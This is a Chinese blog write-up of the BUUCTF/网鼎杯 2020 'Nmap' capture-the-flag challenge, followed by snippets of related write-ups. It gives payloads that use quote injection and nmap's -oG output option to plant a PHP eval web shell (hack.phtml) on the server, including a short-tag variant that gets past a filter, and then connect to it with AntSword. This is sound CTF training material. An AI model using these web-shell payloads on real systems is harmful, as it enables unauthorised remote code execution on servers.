BUU-WEB-[网鼎杯 2020 朱雀组]Nmap

最新推荐文章于 2024-09-10 23:07:37 发布

TzZzEZ-web

最新推荐文章于 2024-09-10 23:07:37 发布

阅读量230

点赞数

分类专栏： BUU-WEB

本文链接：https://blog.csdn.net/qq_24033605/article/details/116762314

版权

BUU-WEB 专栏收录该内容

59 篇文章 2 订阅

订阅专栏

[网鼎杯 2020 朱雀组]Nmap

先查看主页的源码。
在这里插入图片描述
主要功能就是一个网页版的nmap。

//nmap参数：
-oN 标准保存
-oX XML保存
-oG Grep保存
-oA 保存到所有格式
-append-output 补充保存文件

通过测试，可以测试出是单引号闭合。
构建payload：

' <?php @eval($_POST[cmd]);?> -oG hack.phtml

回显：
hacker
尝试使用短标签绕过。

' <?= @eval($_POST[cmd]);?> -oG hack.phtml '

之后进行蚁剑连接。
在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

TzZzEZ-web

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

【学习笔记 48】 buu [网鼎杯 2020 朱雀组]Nmap

weixin_43553654的博客

08-11

781

0x00 知识点 NMAP中使用-0G命令可以实现代码写入 0x01 解题思路打开网站一看发现是一个NMAP网站尝试输入输入任意ip 可以看到这里返回了nmap扫描的结果，这里我们就想到了NMAP里的-oG命令实现代码的写入，那我们这里就可以尝试构造payload，来利用‘拼接，写入我们想要的shell文件 ' <?php @eval($_POST["cmd"]);?> -oG shell.php ' 尝试后发现报错，说明这里有过滤不能直接进行，最后利用fuzz发现过滤了php，

phpweb-[网鼎杯 2020 朱雀组]-[BUUCTF]

qwsn

11-23

2038

0x01、Web 1.phpweb-[网鼎杯 2020 朱雀组]-[传送门->BUUCTF] 第一步：点击传送门，打开题目环境观察题目页面： //打开网页观察网页显示动态，发现网页每隔一段时间会刷新一下，说明可能自动间隔一段时间刷新一次，观察网页，网页上会显示一段warning信息，并提示了data()函数。 //利用BurpSuite拦截网页，看一下有什么异常。观察发现网页会传递两个参数，func和p。func对应的值为date，p对应的值为一串时间格式，说明网页可能向后端传递函数名及其对应的参数

参与评论您还未登录，请先登录后发表或查看评论

[网鼎杯 2020 朱雀组]Nmap

pakho_C的博客

07-27

1585

nmap192.168.0.*--exclude192.168.0.100使用“-exclude”选项来排除某些你不想要扫描的主机。nmap-F192.168.0.101快速扫描，仅扫描nmap-services文件中的端口而避开所有其它的端口。nmap-O127.0.0.1使用选项“-O”和“-osscan-guess”也帮助探测操作系统信息。nmap-p80,443192.168.0.101使用“-P”选项指定你想要扫描的端口。...

[网鼎杯 2020 朱雀组]Nmap 历程记录

最新发布

m0_74196038的博客

09-10

402

我一开始的时候只试了flag.php，没有成功，后面就放弃了，忘了试一试flag.txt,但事实就是这道题有更简单的做法，所以说在解题的时候还是要把基础的打点要做好，后面再返工是很难受的。查了一下资料，nmap里面有一个 -iL 参数，后面可以跟上文件名，表示扫描目标是文件里的所有地址,但是我看了好多师傅的poc，也试了几个都不行，不知道咋回事。扫描自己,发现没啥有用的信息，他这里每扫一个主机会把扫描信息存在一个新的文件里，简单试了一下传的参数，也没发现sql注入。查看源码，给了个提示flag路径。

BUUCTF [网鼎杯 2020 朱雀组] Nmap

Senimo

12-09

3989

BUUCTF [网鼎杯 2020 朱雀组] Nmap 考点：nmap -oG 写入文件、-iL读取扫描文件解法：将nmap扫描结果写入文件时加入一句话木马启动环境：类似Nmap的功能，一个输入命令行，提示输入ip地址，尝试输入正常内容：127.0.0.1 可以得到回显结果，猜测是命令执行，尝试使用|分隔地址与命令 127.0.0.1 | ls 可以看到|被\转义，尝试使用;：提示地址错误，尝试了一些其他的命令执行，也无法实现，参考 ...

buu做题笔记——[网鼎杯 2020 朱雀组]phpweb&[SWPU2019]Web1

weixin_46330722的博客

11-06

1541

BUU[网鼎杯 2020 朱雀组]phpweb [网鼎杯 2020 朱雀组]phpweb 页面看不出啥，抓个包看看。从包中我们可以看到，传递了两个参数，func和p。func的值是date，再结合p的值，我猜测这里是用了call_user_func()来回调函数，即将func的值当作函数名，p的值当作参数。那么我们直接使用system函数查看当前目录下的文件回显Hacker，应该是被waf拦了，用highlight_file()看一下源码 <?php $disable_fun = arr

2020网鼎杯青龙组Boom

05-12

【标题】"2020网鼎杯青龙组Boom" 涉及的是一个网络安全竞赛的场景，其中"网鼎杯"是中国国内知名的网络安全技术大赛，旨在提升参赛者的网络安全技能和应急处理能力。"青龙组"可能是比赛中的一个分组或者阶段，可能...

2020-网鼎杯-白虎组-Web-PicDown(可复现) | 考查/proc文件系统应用

一醉一休的博客

08-22

857

利用linux下面的一个特性，系统中如果一个程序打开了一个文件没有关闭，即便从外部（如os.remove(SECRET_FILE)）删除之后，在 /proc 这个进程的 pid 目录下的 fd 文件描述符目录下还是会有这个文件的 fd，通过这个我们即可得到被删除文件的内容，/proc/[pid]/fd 这个目录里包含了进程打开文件的情况，pid是进程记录的打开文件的序号。解决这两个问题，虚拟机服务器成功运行后，重新反弹shell，还是不行（裂开！🍺暴力破解最后一个数字，这道题是3，

buu Quoted-printable

09-13

Quoted-printable是一种编码方法，常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中，使用"="符号后跟两个十六进制数字来表示原本的字符。...